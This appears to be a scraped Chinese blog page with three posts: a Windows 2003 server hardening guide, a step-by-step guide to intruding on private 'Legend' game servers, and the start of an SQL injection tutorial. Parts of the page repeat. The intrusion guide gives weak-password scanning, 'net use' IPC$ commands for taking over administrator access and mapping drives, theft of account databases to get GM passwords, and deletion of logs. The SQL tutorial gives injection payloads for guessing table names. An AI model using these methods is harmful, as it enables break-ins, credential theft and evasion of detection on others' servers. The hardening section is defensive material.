上个工作是做网站服务器维护,在网上搜索了好多教程,感觉乱的很。干脆自己总结了一套Windows2003服务器安全策略。绝非是网上转载的。都是经过测试的。自己感觉还行吧!欢迎大家测试,也希望与我一起交流服务器的安全问题。希望对大家有帮助!
策略一:关闭windows2003不必要的服务
·Computer Browser 维护网络上计算机的最新列表以及提供这个列表
·Task scheduler 允许程序在指定时间运行
·Routing and Remote Access 在局域网以及广域网环境中为企业提供路由服务
·Removable storage 管理可移动媒体、驱动程序和库
·Remote Registry Service 允许远程注册表操作
·Print Spooler 将文件加载到内存中以便以后打印。
·IPSEC Policy Agent 管理IP安全策略及启动ISAKMP/OakleyIKE)和IP安全驱动程序
·Distributed Link Tracking Client 当文件在网络域的NTFS卷中移动时发送通知
·Com+ Event System 提供事件的自动发布到订阅COM组件
·Alerter 通知选定的用户和计算机管理警报
·Error Reporting Service 收集、存储和向 Microsoft 报告异常应用程序
·Messenger 传输客户端和服务器之间的 NET SEND 和 警报器服务消息
·Telnet 允许远程用户登录到此计算机并运行程序
策略二:磁盘权限设置
C盘只给administrators和system权限,其他的权限不给,其他的盘也可以这样设置,这里给的system权限也不一定需要给,只是由于某些第三方应用程序是以服务形式启动的,需要加上这个用户,否则造成启动不了。
Windows目录要加上给users的默认权限,否则ASP和ASPX等应用程序就无法运行。
策略三:禁止 Windows 系统进行空连接
在注册表中找到相应的键值HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/LSA,
将DWORD值RestrictAnonymous的键值改为1
策略四:关闭不需要的端口
本地连接--属性--Internet协议(TCP/IP)--高级--选项--TCP/IP筛选--属性--把勾打上,然后添加你需要的端口即可。(如:3389、21、1433、3306、80)
更改远程连接端口方法
开始-->运行-->输入regedit
查找3389:
请按以下步骤查找:
1、HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp下的PortNumber=3389改为自宝义的端口号
2、HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp下的PortNumber=3389改为自宝义的端口号
修改3389为你想要的数字(在十进制下)----再点16进制(系统会自动转换)----最后确定!这样就ok了。
这样3389端口已经修改了,但还要重新启动主机,这样3389端口才算修改成功!如果不重新启动3389还
是修改不了的!重起后下次就可以用新端口进入了!
禁用TCP/IP上的NETBIOS
本地连接--属性--Internet协议(TCP/IP)--高级—WINS--禁用TCP/IP上的NETBIOS
策略五:关闭默认共享的空连接
首先编写如下内容的批处理文件:
@echo off
net share C$ /delete
net share D$ /delete
net share E$ /delete
net share F$ /delete
net share admin$ /delete
以上文件的内容用户可以根据自己需要进行修改。保存为delshare.bat,存放到系统所在文件夹下的system32\GroupPolicy\User\Scripts\Logon目录下。然后在开始菜单→运行中输入gpedit.msc,
回车即可打开组策略编辑器。点击用户配置→Windows设置→脚本(登录/注销)→登录.
在出现的“登录 属性”窗口中单击“添加”,会出现“添加脚本”对话框,在该窗口的“脚本名”栏中输入delshare.bat,然后单击“确定”按钮即可。
重新启动计算机系统,就可以自动将系统所有的隐藏共享文件夹全部取消了,这样就能将系统安全隐患降低到最低限度。
策略五:IIS安全设置
1、不使用默认的Web站点,如果使用也要将IIS目录与系统磁盘分开。
2、删除IIS默认创建的Inetpub目录(在安装系统的盘上)。
3、删除系统盘下的虚拟目录,如:_vti_bin、IISSamples、Scripts、IIShelp、IISAdmin、IIShelp、MSADC。
4、删除不必要的IIS扩展名映射。
右键单击“默认Web站点→属性→主目录→配置”,打开应用程序窗口,去掉不必要的应用程序映射。主要为.shtml、shtm、stm。
5、更改IIS日志的路径
右键单击“默认Web站点→属性-网站-在启用日志记录下点击属性
策略六:注册表相关安全设置
1、隐藏重要文件/目录
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current-Version\Explorer\Advanced\Folder\Hidden\SHOWALL”
鼠标右击 “CheckedValue”,选择修改,把数值由1改为0。
2、防止SYN洪水攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
新建DWORD值,名为SynAttackProtect,值为2
3、禁止响应ICMP路由通告报文
HKEY_LOCAL_MACHINE\SYSTEM \ CurrentControlSet\ Services\Tcpip\Parameters\Interfaces\interface
新建DWORD值,名为PerformRouterDiscovery 值为0。
4、防止ICMP重定向报文的攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
将EnableICMPRedirects 值设为0
5、不支持IGMP协议
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
新建DWORD值,名为IGMPLevel 值为0。
策略七:组件安全设置篇
A、 卸载WScript.Shell 和 Shell.application 组件,将下面的代码保存为一个.BAT文件执行(分2000和2003系统)
windows2000.bat
regsvr32/u C:\WINNT\System32\wshom.ocx
del C:\WINNT\System32\wshom.ocx
regsvr32/u C:\WINNT\system32\shell32.dll
del C:\WINNT\system32\shell32.dll
windows2003.bat
regsvr32/u C:\WINDOWS\System32\wshom.ocx
del C:\WINDOWS\System32\wshom.ocx
regsvr32/u C:\WINDOWS\system32\shell32.dll
del C:\WINDOWS\system32\shell32.dll
B、改名不安全组件,需要注意的是组件的名称和Clsid都要改,并且要改彻底了,不要照抄,要自己改
【开始→运行→regedit→回车】打开注册表编辑器
然后【编辑→查找→填写Shell.application→查找下一个】
用这个方法能找到两个注册表项:
{13709620-C279-11CE-A49E-444553540000} 和 Shell.application 。
第一步:为了确保万无一失,把这两个注册表项导出来,保存为xxxx.reg 文件。
第二步:比如我们想做这样的更改
13709620-C279-11CE-A49E-444553540000 改名为 13709620-C279-11CE-A49E-444553540001
Shell.application 改名为 Shell.application_nohack
第三步:那么,就把刚才导出的.reg文件里的内容按上面的对应关系替换掉,然后把修改好
的.reg文件导入到注册表中(双击即可),导入了改名后的注册表项之后,别忘记了删除原有的那两个项目。这里需要注意一点,Clsid中只能是十个数字和ABCDEF六个字母。
其实,只要把对应注册表项导出来备份,然后直接改键名就可以了,
改好的例子
建议自己改
应该可一次成功
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}]
@="Shell Automation Service"
[HKEY_CLASSES_ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}\InProcServer32]
@="C:\\WINNT\\system32\\shell32.dll"
"ThreadingModel"="Apartment"
[HKEY_CLASSES_ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}\ProgID]
@="Shell.Application_nohack.1"
[HKEY_CLASSES_ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}\TypeLib]
@="{50a7e9b0-70ef-11d1-b75a-00a0c90564fe}"
[HKEY_CLASSES_ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}\Version]
@="1.1"
[HKEY_CLASSES_ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}\VersionIndependentProgID]
@="Shell.Application_nohack"
[HKEY_CLASSES_ROOT\Shell.Application_nohack]
@="Shell Automation Service"
[HKEY_CLASSES_ROOT\Shell.Application_nohack\CLSID]
@="{13709620-C279-11CE-A49E-444553540001}"
[HKEY_CLASSES_ROOT\Shell.Application_nohack\CurVer]
@="Shell.Application_nohack.1"
评论:
WScript.Shell 和 Shell.application 组件是 脚本入侵过程中,提升权限的重要环节,这两个组件的卸载和修改对应注册键名,可以很大程度的提高虚拟主机的脚本安全性能,一般来说,ASP和php类脚本提升权限的功能是无法实现了,再加上一些系统服务、硬盘访问权限、端口过滤、本地安全策略的设置,虚拟主机因该说,安全性能有非常大的提高,黑客入侵的可能性是非常低了。注销了Shell组件之后,侵入者运行提升工具的可能性就很小了,但是prel等别的脚本语言也有shell能力,为防万一,还是设置一下为好。下面是另外一种设置,大同小异。
C、禁止使用FileSystemObject组件
FileSystemObject可以对文件进行常规操作,可以通过修改注册表,将此组件改名,来防止此类木马的危害。
HKEY_CLASSES_ROOT\Scripting.FileSystemObject\
改名为其它的名字,如:改为 FileSystemObject_ChangeName
自己以后调用的时候使用这个就可以正常调用此组件了
也要将clsid值也改一下
HKEY_CLASSES_ROOT\Scripting.FileSystemObject\CLSID\项目的值
也可以将其删除,来防止此类木马的危害。
2000注销此组件命令:RegSrv32 /u C:\WINNT\SYSTEM\scrrun.dll
2003注销此组件命令:RegSrv32 /u C:\WINDOWS\SYSTEM\scrrun.dll
如何禁止Guest用户使用scrrun.dll来防止调用此组件?
使用这个命令:cacls C:\WINNT\system32\scrrun.dll /e /d guests
D、禁止使用WScript.Shell组件
WScript.Shell可以调用系统内核运行DOS基本命令
可以通过修改注册表,将此组件改名,来防止此类木马的危害。
HKEY_CLASSES_ROOT\WScript.Shell\及HKEY_CLASSES_ROOT\WScript.Shell.1\
改名为其它的名字,如:改为WScript.Shell_ChangeName 或 WScript.Shell.1_ChangeName
自己以后调用的时候使用这个就可以正常调用此组件了
也要将clsid值也改一下
HKEY_CLASSES_ROOT\WScript.Shell\CLSID\项目的值
HKEY_CLASSES_ROOT\WScript.Shell.1\CLSID\项目的值
也可以将其删除,来防止此类木马的危害。
E、禁止使用Shell.Application组件
Shell.Application可以调用系统内核运行DOS基本命令
可以通过修改注册表,将此组件改名,来防止此类木马的危害。
HKEY_CLASSES_ROOT\Shell.Application\及
HKEY_CLASSES_ROOT\Shell.Application.1\
改名为其它的名字,如:改为Shell.Application_ChangeName 或 Shell.Application.1_ChangeName
自己以后调用的时候使用这个就可以正常调用此组件了
也要将clsid值也改一下
HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值
HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值
也可以将其删除,来防止此类木马的危害。
禁止Guest用户使用shell32.dll来防止调用此组件。
2000使用命令:cacls C:\WINNT\system32\shell32.dll /e /d guests
2003使用命令:cacls C:\WINDOWS\system32\shell32.dll /e /d guests
注:操作均需要重新启动WEB服务后才会生效。
F、调用Cmd.exe
禁用Guests组用户调用cmd.exe
2000使用命令:cacls C:\WINNT\system32\Cmd.exe /e /d guests
2003使用命令:cacls C:\WINDOWS\system32\Cmd.exe /e /d guests
通过以上四步的设置基本可以防范目前比较流行的几种木马,但最有效的办法还是通过综合安全设置,将服务器、程序安全都达到一定标准,才可能将安全等级设置较高,防范更多非法入侵。
...
上个工作是做网站服务器维护,在网上搜索了好多教程,感觉乱的很。干脆自己总结了一套Windows2003服务器安全策略。绝非是网上转载的。都是经过测试的。自己感觉还行吧!欢迎大家测试,也希望与我一起交流服务器的安全问题。希望对大家有帮助!
策略一:关闭windows2003不必要的服务
·Computer Browser 维护网络上计算机的最新列表以及提供这个列表
·Task scheduler 允许程序在指定时间运行
·Routing and Remote Access 在局域网以及广域网环境中为企业提供路由服务
·Removable storage 管理可移动媒体、驱动程序和库
·Remote Registry Service 允许远程注册表操作
·Print Spooler 将文件加载到内存中以便以后打印。
·IPSEC Policy Agent 管理IP安全策略及启动ISAKMP/OakleyIKE)和IP安全驱动程序
·Distributed Link Tracking Client 当文件在网络域的NTFS卷中移动时发送通知
·Com+ Event System 提供事件的自动发布到订阅COM组件
·Alerter 通知选定的用户和计算机管理警报
·Error Reporting Service 收集、存储和向 Microsoft 报告异常应用程序
·Messenger 传输客户端和服务器之间的 NET SEND 和 警报器服务消息
·Telnet 允许远程用户登录到此计算机并运行程序
策略二:磁盘权限设置
C盘只给administrators和system权限,其他的权限不给,其他的盘也可以这样设置,这里给的system权限也不一定需要给,只是由于某些第三方应用程序是以服务形式启动的,需要加上这个用户,否则造成启动不了。
Windows目录要加上给users的默认权限,否则ASP和ASPX等应用程序就无法运行。
策略三:禁止 Windows 系统进行空连接
在注册表中找到相应的键值HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/LSA,
将DWORD值RestrictAnonymous的键值改为1
策略四:关闭不需要的端口
本地连接--属性--Internet协议(TCP/IP)--高级--选项--TCP/IP筛选--属性--把勾打上,然后添加你需要的端口即可。(如:3389、21、1433、3306、80)
更改远程连接端口方法
开始-->运行-->输入regedit
查找3389:
请按以下步骤查找:
1、HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp下的PortNumber=3389改为自宝义的端口号
2、HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp下的PortNumber=3389改为自宝义的端口号
修改3389为你想要的数字(在十进制下)----再点16进制(系统会自动转换)----最后确定!这样就ok了。
这样3389端口已经修改了,但还要重新启动主机,这样3389端口才算修改成功!如果不重新启动3389还
是修改不了的!重起后下次就可以用新端口进入了!
禁用TCP/IP上的NETBIOS
本地连接--属性--Internet协议(TCP/IP)--高级—WINS--禁用TCP/IP上的NETBIOS
策略五:关闭默认共享的空连接
首先编写如下内容的批处理文件:
@echo off
net share C$ /delete
net share D$ /delete
net share E$ /delete
net share F$ /delete
net share admin$ /delete
以上文件的内容用户可以根据自己需要进行修改。保存为delshare.bat,存放到系统所在文件夹下的system32\GroupPolicy\User\Scripts\Logon目录下。然后在开始菜单→运行中输入gpedit.msc,
回车即可打开组策略编辑器。点击用户配置→Windows设置→脚本(登录/注销)→登录.
在出现的“登录 属性”窗口中单击“添加”,会出现“添加脚本”对话框,在该窗口的“脚本名”栏中输入delshare.bat,然后单击“确定”按钮即可。
重新启动计算机系统,就可以自动将系统所有的隐藏共享文件夹全部取消了,这样就能将系统安全隐患降低到最低限度。
策略五:IIS安全设置
1、不使用默认的Web站点,如果使用也要将IIS目录与系统磁盘分开。
2、删除IIS默认创建的Inetpub目录(在安装系统的盘上)。
3、删除系统盘下的虚拟目录,如:_vti_bin、IISSamples、Scripts、IIShelp、IISAdmin、IIShelp、MSADC。
4、删除不必要的IIS扩展名映射。
右键单击“默认Web站点→属性→主目录→配置”,打开应用程序窗口,去掉不必要的应用程序映射。主要为.shtml、shtm、stm。
5、更改IIS日志的路径
右键单击“默认Web站点→属性-网站-在启用日志记录下点击属性
策略六:注册表相关安全设置
1、隐藏重要文件/目录
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current-Version\Explorer\Advanced\Folder\Hidden\SHOWALL”
鼠标右击 “CheckedValue”,选择修改,把数值由1改为0。
2、防止SYN洪水攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
新建DWORD值,名为SynAttackProtect,值为2
3、禁止响应ICMP路由通告报文
HKEY_LOCAL_MACHINE\SYSTEM \ CurrentControlSet\ Services\Tcpip\Parameters\Interfaces\interface
新建DWORD值,名为PerformRouterDiscovery 值为0。
4、防止ICMP重定向报文的攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
将EnableICMPRedirects 值设为0
5、不支持IGMP协议
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
新建DWORD值,名为IGMPLevel 值为0。
策略七:组件安全设置篇
A、 卸载WScript.Shell 和 Shell.application 组件,将下面的代码保存为一个.BAT文件执行(分2000和2003系统)
windows2000.bat
regsvr32/u C:\WINNT\System32\wshom.ocx
del C:\WINNT\System32\wshom.ocx
regsvr32/u C:\WINNT\system32\shell32.dll
del C:\WINNT\system32\shell32.dll
windows2003.bat
regsvr32/u C:\WINDOWS\System32\wshom.ocx
del C:\WINDOWS\System32\wshom.ocx
regsvr32/u C:\WINDOWS\system32\shell32.dll
del C:\WINDOWS\system32\shell32.dll
B、改名不安全组件,需要注意的是组件的名称和Clsid都要改,并且要改彻底了,不要照抄,要自己改
【开始→运行→regedit→回车】打开注册表编辑器
然后【编辑→查找→填写Shell.application→查找下一个】
用这个方法能找到两个注册表项:
{13709620-C279-11CE-A49E-444553540000} 和 Shell.application 。
第一步:为了确保万无一失,把这两个注册表项导出来,保存为xxxx.reg 文件。
第二步:比如我们想做这样的更改
13709620-C279-11CE-A49E-444553540000 改名为 13709620-C279-11CE-A49E-444553540001
Shell.application 改名为 Shell.application_nohack
第三步:那么,就把刚才导出的.reg文件里的内容按上面的对应关系替换掉,然后把修改好
的.reg文件导入到注册表中(双击即可),导入了改名后的注册表项之后,别忘记了删除原有的那两个项目。这里需要注意一点,Clsid中只能是十个数字和ABCDEF六个字母。
其实,只要把对应注册表项导出来备份,然后直接改键名就可以了,
改好的例子
建议自己改
应该可一次成功
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}]
@="Shell Automation Service"
[HKEY_CLASSES_ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}\InProcServer32]
@="C:\\WINNT\\system32\\shell32.dll"
"ThreadingModel"="Apartment"
[HKEY_CLASSES_ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}\ProgID]
@="Shell.Application_nohack.1"
[HKEY_CLASSES_ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}\TypeLib]
@="{50a7e9b0-70ef-11d1-b75a-00a0c90564fe}"
[HKEY_CLASSES_ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}\Version]
@="1.1"
[HKEY_CLASSES_ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}\VersionIndependentProgID]
@="Shell.Application_nohack"
[HKEY_CLASSES_ROOT\Shell.Application_nohack]
@="Shell Automation Service"
[HKEY_CLASSES_ROOT\Shell.Application_nohack\CLSID]
@="{13709620-C279-11CE-A49E-444553540001}"
[HKEY_CLASSES_ROOT\Shell.Application_nohack\CurVer]
@="Shell.Application_nohack.1"
评论:
WScript.Shell 和 Shell.application 组件是 脚本入侵过程中,提升权限的重要环节,这两个组件的卸载和修改对应注册键名,可以很大程度的提高虚拟主机的脚本安全性能,一般来说,ASP和php类脚本提升权限的功能是无法实现了,再加上一些系统服务、硬盘访问权限、端口过滤、本地安全策略的设置,虚拟主机因该说,安全性能有非常大的提高,黑客入侵的可能性是非常低了。注销了Shell组件之后,侵入者运行提升工具的可能性就很小了,但是prel等别的脚本语言也有shell能力,为防万一,还是设置一下为好。下面是另外一种设置,大同小异。
C、禁止使用FileSystemObject组件
FileSystemObject可以对文件进行常规操作,可以通过修改注册表,将此组件改名,来防止此类木马的危害。
HKEY_CLASSES_ROOT\Scripting.FileSystemObject\
改名为其它的名字,如:改为 FileSystemObject_ChangeName
自己以后调用的时候使用这个就可以正常调用此组件了
也要将clsid值也改一下
HKEY_CLASSES_ROOT\Scripting.FileSystemObject\CLSID\项目的值
也可以将其删除,来防止此类木马的危害。
2000注销此组件命令:RegSrv32 /u C:\WINNT\SYSTEM\scrrun.dll
2003注销此组件命令:RegSrv32 /u C:\WINDOWS\SYSTEM\scrrun.dll
如何禁止Guest用户使用scrrun.dll来防止调用此组件?
使用这个命令:cacls C:\WINNT\system32\scrrun.dll /e /d guests
D、禁止使用WScript.Shell组件
WScript.Shell可以调用系统内核运行DOS基本命令
可以通过修改注册表,将此组件改名,来防止此类木马的危害。
HKEY_CLASSES_ROOT\WScript.Shell\及HKEY_CLASSES_ROOT\WScript.Shell.1\
改名为其它的名字,如:改为WScript.Shell_ChangeName 或 WScript.Shell.1_ChangeName
自己以后调用的时候使用这个就可以正常调用此组件了
也要将clsid值也改一下
HKEY_CLASSES_ROOT\WScript.Shell\CLSID\项目的值
HKEY_CLASSES_ROOT\WScript.Shell.1\CLSID\项目的值
也可以将其删除,来防止此类木马的危害。
E、禁止使用Shell.Application组件
Shell.Application可以调用系统内核运行DOS基本命令
可以通过修改注册表,将此组件改名,来防止此类木马的危害。
HKEY_CLASSES_ROOT\Shell.Application\及
HKEY_CLASSES_ROOT\Shell.Application.1\
改名为其它的名字,如:改为Shell.Application_ChangeName 或 Shell.Application.1_ChangeName
自己以后调用的时候使用这个就可以正常调用此组件了
也要将clsid值也改一下
HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值
HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值
也可以将其删除,来防止此类木马的危害。
禁止Guest用户使用shell32.dll来防止调用此组件。
2000使用命令:cacls C:\WINNT\system32\shell32.dll /e /d guests
2003使用命令:cacls C:\WINDOWS\system32\shell32.dll /e /d guests
注:操作均需要重新启动WEB服务后才会生效。
F、调用Cmd.exe
禁用Guests组用户调用cmd.exe
2000使用命令:cacls C:\WINNT\system32\Cmd.exe /e /d guests
2003使用命令:cacls C:\WINDOWS\system32\Cmd.exe /e /d guests
通过以上四步的设置基本可以防范目前比较流行的几种木马,但最有效的办法还是通过综合安全设置,将服务器、程序安全都达到一定标准,才可能将安全等级设置较高,防范更多非法入侵。
...
24 2009-12
分类:技术文章 | 评论:0 | 浏览:
玩多了传奇,你就会发现,其实私服是存在很多漏洞的,比如以前的可以刷装备,刷金币等等,只要用心去发现总有漏洞的。也不是教人做坏事,对于一个传奇私服,进去如果不买装备那么就是个垃圾,受人欺负,就是上土城买药都要被人追着砍,一个地丁你就挂了。花钱吧,想想又太浪费了,毕竟这个东西不是正规的,而且架设一个私服很简单,不要什么成本,谁知道GM什么时候就关了呢,这是很正常的现象,金钱驱动。
那么另一个方法就是去发现它的漏洞,然后去入侵它,用流氓的手段去攻击流氓的作为。首先讲下简单的攻击方法。开始你需要去下个X-SCAN,这个是用来扫描IP的工具。看看谁是弱口令(IP也非常容易得到,私服都有,弱口令就是用户名和密码都是系统默认的,没有改)。然后就是打开DOS系统 在DOS下进行操作
c:\>net use\\192.168.0.1\ipc$""\user:administrator 进入对方计算机USER进入的就是管理员用户。
进入了以后就好办了,可以找你要黑的私服,做GM也好,搞破坏删除也好,比如做GM吧!
c:\>copy\\192.168.0.1\d$mirserver2000\envir\adminlist.txt 都是命令,可以看出来,其余的想怎么改就凭你了,但是我得解释下,这段代码目的很简单就是将D盘拷贝一个传奇私服的GM的列表,你可以把你自己添加进去再编辑
c:\>edit\\192.168.0.1d$mirserver\mir2000\envir\adminlist.txt
这样就可以了。只是利用弱口令进入计算机的方法,当然了还有更多的方法。
这个方法只对弱口令的私服IP好办,如果不是呢,就要想更好的办法了,毕竟弱口令的少。
下面介绍个入侵私服小攻略:
私服的运行平台是,windows平台,一般的私服,为了能达到稳定性,都用了win2000平台。win2000是一个网络操作系统,所谓网络操作系统,就是只要能有系统的密码,就可以完全控制这一台电脑,无论你在什么地方。
我们可以查私服主机的密码,有一部分私服的网管,对win2000不了解,在安装时未设系统密码,或者设了很简单的密码,如123456等。
查密码,可以用好的工具,如hscan,我个人认为不错,可以用hscan2.0。
输入私服的IP,让它自动扫描。
运气好的好,扫到了。呵呵,就可以进行攻击了,扫不到的话,你就再慢慢扫哦。扫到密码。你可以进行入侵。
注意,你自己的电脑一定要是win2000啊,或者xp也行。98是不行的。
1、开始-运行-输入:cmd
2、在这个黑的窗口中,输入:net use \\xxx.xxx.xxx.xxx\ipc$Content$nbsp;"密码" /user:"用户名"
注意,这个xxx.xxx.xxx.xxx代表,私服的IP。用户名,密码,是它系统的。就是你扫描到的,密码如果为空就不用打。显示命令成功完成,恭喜你,私服被你控制了。现在,要做的事是,映射私服的硬盘为你的硬盘。
3、输入:net use x: \\xxx.xxx.xxx.xxx\c$Content$nbsp;
net use y: \\xxx.xxx.xxx.xxx\d$Content$nbsp;
说明,这个x: y:这个可以随便打,只要你电脑上没有这两个分区名就行,这个c$,d$是对方机器的c盘,d盘
如果这两个命令成功的话,它的c,d盘就被你控制了,就跟在自己电脑上操作一样方便。
现在我们谈谈,如何有效地去玩它的私服了。
你先在他的私服里注册一个帐号,在里面选好职业。
然后,找到他服务文件所在的地方,一般的私服文件放在 d:\mirserver里面
下面的事,就是将自己添加到GM列表中,将真的GM帐号拿来,先在GM列表.adminlist.txt里面找到GM名字,
然后下载他的帐号数据库。有两个,一个是hum.db,另一个是id.db
用记事本打开hum.db,看看,GM个这个人物是属于哪个帐号的。找到了,然后在id.db里面找帐号的密码。
现在GM帐号密码有了。好了,用GM帐号进去。运行命令,@relaodadmin
哈哈,现在你的号就是GM了,为了不让GM发现,你可以在adminlist.txt里面删除你的名字。但如果服务器重启了,你就不是GM了。所 以,要在这段时间里做你想要做的事,加速做啊。
如修改自己的等级,常规是修改到50级,你可以输入-1。这样,就是255级了。可以去网上找一张GM命令表,所有的命令都在上面,一目了然。
运行GM命令了,会在服务器上留下记录的,比如说刷装备,为了不让网管发现,所以你得删除这个记录。
其实还有一种最好的办法,就是,修改npc。比如说,本来是要100换金条的,你可以修改成1元就能换金条。
这个功能是自己设计的,你可以研究一下他的npc编写方法。这个好像是c语言。
最后声明,是网络操作系统,用来和网络共享机器资源的,用来做游戏私服,和你共享了一切,利用这个便利,去修改数据库,就这样简单的入侵私服
可能由于技术的发展,方法不一定凑效了,但可以做为参考资料,然后去寻找一些更新的攻击方法,讲入侵进行到底。
...
那么另一个方法就是去发现它的漏洞,然后去入侵它,用流氓的手段去攻击流氓的作为。首先讲下简单的攻击方法。开始你需要去下个X-SCAN,这个是用来扫描IP的工具。看看谁是弱口令(IP也非常容易得到,私服都有,弱口令就是用户名和密码都是系统默认的,没有改)。然后就是打开DOS系统 在DOS下进行操作
c:\>net use\\192.168.0.1\ipc$""\user:administrator 进入对方计算机USER进入的就是管理员用户。
进入了以后就好办了,可以找你要黑的私服,做GM也好,搞破坏删除也好,比如做GM吧!
c:\>copy\\192.168.0.1\d$mirserver2000\envir\adminlist.txt 都是命令,可以看出来,其余的想怎么改就凭你了,但是我得解释下,这段代码目的很简单就是将D盘拷贝一个传奇私服的GM的列表,你可以把你自己添加进去再编辑
c:\>edit\\192.168.0.1d$mirserver\mir2000\envir\adminlist.txt
这样就可以了。只是利用弱口令进入计算机的方法,当然了还有更多的方法。
这个方法只对弱口令的私服IP好办,如果不是呢,就要想更好的办法了,毕竟弱口令的少。
下面介绍个入侵私服小攻略:
私服的运行平台是,windows平台,一般的私服,为了能达到稳定性,都用了win2000平台。win2000是一个网络操作系统,所谓网络操作系统,就是只要能有系统的密码,就可以完全控制这一台电脑,无论你在什么地方。
我们可以查私服主机的密码,有一部分私服的网管,对win2000不了解,在安装时未设系统密码,或者设了很简单的密码,如123456等。
查密码,可以用好的工具,如hscan,我个人认为不错,可以用hscan2.0。
输入私服的IP,让它自动扫描。
运气好的好,扫到了。呵呵,就可以进行攻击了,扫不到的话,你就再慢慢扫哦。扫到密码。你可以进行入侵。
注意,你自己的电脑一定要是win2000啊,或者xp也行。98是不行的。
1、开始-运行-输入:cmd
2、在这个黑的窗口中,输入:net use \\xxx.xxx.xxx.xxx\ipc$Content$nbsp;"密码" /user:"用户名"
注意,这个xxx.xxx.xxx.xxx代表,私服的IP。用户名,密码,是它系统的。就是你扫描到的,密码如果为空就不用打。显示命令成功完成,恭喜你,私服被你控制了。现在,要做的事是,映射私服的硬盘为你的硬盘。
3、输入:net use x: \\xxx.xxx.xxx.xxx\c$Content$nbsp;
net use y: \\xxx.xxx.xxx.xxx\d$Content$nbsp;
说明,这个x: y:这个可以随便打,只要你电脑上没有这两个分区名就行,这个c$,d$是对方机器的c盘,d盘
如果这两个命令成功的话,它的c,d盘就被你控制了,就跟在自己电脑上操作一样方便。
现在我们谈谈,如何有效地去玩它的私服了。
你先在他的私服里注册一个帐号,在里面选好职业。
然后,找到他服务文件所在的地方,一般的私服文件放在 d:\mirserver里面
下面的事,就是将自己添加到GM列表中,将真的GM帐号拿来,先在GM列表.adminlist.txt里面找到GM名字,
然后下载他的帐号数据库。有两个,一个是hum.db,另一个是id.db
用记事本打开hum.db,看看,GM个这个人物是属于哪个帐号的。找到了,然后在id.db里面找帐号的密码。
现在GM帐号密码有了。好了,用GM帐号进去。运行命令,@relaodadmin
哈哈,现在你的号就是GM了,为了不让GM发现,你可以在adminlist.txt里面删除你的名字。但如果服务器重启了,你就不是GM了。所 以,要在这段时间里做你想要做的事,加速做啊。
如修改自己的等级,常规是修改到50级,你可以输入-1。这样,就是255级了。可以去网上找一张GM命令表,所有的命令都在上面,一目了然。
运行GM命令了,会在服务器上留下记录的,比如说刷装备,为了不让网管发现,所以你得删除这个记录。
其实还有一种最好的办法,就是,修改npc。比如说,本来是要100换金条的,你可以修改成1元就能换金条。
这个功能是自己设计的,你可以研究一下他的npc编写方法。这个好像是c语言。
最后声明,是网络操作系统,用来和网络共享机器资源的,用来做游戏私服,和你共享了一切,利用这个便利,去修改数据库,就这样简单的入侵私服
可能由于技术的发展,方法不一定凑效了,但可以做为参考资料,然后去寻找一些更新的攻击方法,讲入侵进行到底。
...
24 2009-12
分类:技术文章 | 评论:0 | 浏览:
第一节、SQL注入的一般步骤
首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。
其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种:
(A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:
Select * from 表名 where 字段=49
注入的参数为ID=49 And [查询条件],即是生成语句:
Select * from 表名 where 字段=49 And [查询条件]
(B) Class=连续剧 这类注入的参数是字符型,SQL语句原貌大致概如下:
Select * from 表名 where 字段=’连续剧’
注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ,即是生成语句:
Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’
(C) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:
Select * from 表名 where 字段like ’%关键字%’
注入的参数为keyword=’ and [查询条件] and ‘%25’=’, 即是生成语句:
Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’
接着,将查询条件替换成SQL语句,猜解表名,例如:
ID=49 And (Select Count(*) from Admin)>=0
如果页面就与ID=49的相同,说明附加条件成立,即表Admin存在,反之,即不存在(请牢记这种方法)。如此循环,直至猜到表名为止。
表名猜出来后,将Count(*)替换成Count(字段名),用同样的原理猜解字段名。
